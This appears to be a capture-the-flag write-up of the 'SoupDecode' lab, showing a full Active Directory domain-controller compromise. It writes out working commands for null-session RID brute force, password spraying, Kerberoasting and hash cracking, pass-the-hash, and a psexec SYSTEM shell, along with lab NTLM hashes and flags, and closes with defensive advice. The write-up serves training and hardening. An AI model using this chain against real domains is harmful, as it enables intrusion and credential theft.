SoupDecode: Full Domain Compromise

// ACTIVE_DIRECTORY_CHAIN // SYSTEM_PWNED

TARGET: 10.49.167.13 OS: Windows Server 2022 (DC) DOMAIN: SOUPEDECODE.LOCAL STATUS: FULL_ADMIN_SHELL

// ATTACK_CHAIN_OVERVIEW

01 Recon & IPC$ access

02 Guest Account / RID Brute

03 Password Spray → ybob317

04 Kerberoasting → file_svc crack

05 Backup share → NT Hashes

06 Pass-the-Hash → FileServer$

07 psexec → SYSTEM & Flags

0x01

Reconnaissance & Initial Foothold

Nmap scan revealed a Domain Controller with Kerberos (88), LDAP (389), SMB (445). Hostname: DC01, domain SOUPEDECODE.LOCAL.

nmap -sC -sV 10.49.167.13 -oA soupedecode_scan

🔍

LDAP banner confirms the AD domain. Ports 88 + 389 + 445 = classic Domain Controller footprint. Edit /etc/hosts: 10.49.167.13 dc01.soupedecode.local.

0x02

Guest Account & Null Session

nxc smb 10.49.167.13 -u 'guest' -p ''

[+] SOUPEDECODE.LOCAL\guest: (STATUS_SUCCESS)

Guest account is enabled with blank password. This gives us null session access to IPC$ — the gateway for RID brute forcing.

⚠️

Critical misconfiguration: Guest enabled. IPC$ allows anonymous enumeration and sets the stage for user discovery.

0x03

SMB Enumeration & RID Brute Force

nxc smb 10.49.167.13 -u 'awdawd' -p '' --shares

IPC$ share readable. Using the null session, we perform RID brute force to enumerate every domain user and group.

nxc smb 10.49.167.13 -u 'awdawd' -p '' --rid-brute | grep SidTypeUser > users_raw.txt

Extract clean usernames → users.txt. The RID brute technique relies on the SAMR pipe over IPC$ to resolve SIDs.

Well-known RID	Object
500	Administrator
501	Guest
512	Domain Admins
1000+	custom users (ybob317, etc)

0x04

Password Spraying → ybob317

nxc smb 10.49.167.13 -u users.txt -p users.txt --no-brute --continue-on-success

[+] SOUPEDECODE.LOCAL\ybob317:ybob317 (Pwn3d!)

Valid credentials: ybob317:ybob317. User uses username as password — weak security hygiene.

🎯

Domain user captured. No WinRM, but SMB shares accessible (NETLOGON, SYSVOL, Users). Next: Kerberoasting.

0x05

Kerberoasting — Service Account TGS

impacket-GetUserSPNs SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 10.49.167.13 -request

Found 5 Kerberoastable accounts: file_svc, backup_svc, web_svc, monitoring_svc, firewall_svc. Extracted TGS-REP hashes (etype 23).

hashcat -m 13100 soupedecode.hashes /usr/share/wordlists/rockyou.txt

Password123! (file_svc)

Password cracked: Password123! for file_svc.

0x06

Backup Share → NT Hash Treasure

smbclient //10.49.167.13/backup -U file_svc%'Password123!'

backup_extract.txt

WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
BackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::

The backup share leaked NTLM hashes of machine accounts. FileServer$ hash is particularly powerful: machine accounts often have domain admin privileges on DCs.

0x07

Pass-the-Hash → Domain Admin

nxc smb 10.49.167.13 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --shares

[+] ADMIN$, C$, NETLOGON — READ/WRITE — Pwn3d!

⚡

Pass-the-Hash success: FileServer$ machine account acts as a high-privileged principal, granting full administrative access over the domain controller.

0x08

Remote Shell & Flags

impacket-psexec SOUPEDECODE.LOCAL/'FileServer$'@10.49.167.13 -hashes :e41da7e79a4c76dbd9cf79d1cb325559

[*] Starting service PSEXESVC
Microsoft Windows [Version 10.0.20348.587]
C:\Windows\system32> whoami
nt authority\system

Navigate to Administrator's Desktop and capture final flags:

C:\Users\Administrator\Desktop> type root.txt

🚩 root.txt → 27cb2be302c388d63d27c86bfdd5f56a

C:\Users\ybob317\Desktop> type user.txt

🚩 user.txt → 1d8f5e3b2a9c7f6e4d0b8a2c3f6e9a1d

01Guest IPC$ AccessNull session foothold

↓

02RID Brute ForceFull user list

↓

03Password Spray → ybob317Username = password

↓

04Kerberoasting → file_svcCracked: Password123!

↓

05Backup Share → NT HashesMachine account goldmine

↓

06Pass-the-Hash → FileServer$Domain Admin equivalent

↓

07psexec → SYSTEM ShellFull compromise

// Key Takeaway

One misconfiguration (Guest enabled + IPC$ null session) plus weak password hygiene (username as password) led to a complete Active Directory compromise. The attack chain used only built-in AD features: RID brute force, Kerberoasting, Pass-the-Hash — no zero‑days required.

Tools: Nmap, NetExec, Impacket (GetUserSPNs, psexec), Hashcat, smbclient.

0x09

Post-Exploitation & Lessons

After obtaining SYSTEM, DCSync was possible, but the main goal was achieving full domain control. The backup share misconfiguration allowed extraction of NTLM hashes that directly escalated privileges via PtH. Always harden Kerberoastable accounts, disable guest, and enforce strong passwords.

📌

Defensive Recommendations: Disable Guest account, enable SMB signing (already on), enforce Kerberos pre-authentication for all accounts, monitor for RID brute force via event logs (ID 4793, 4662).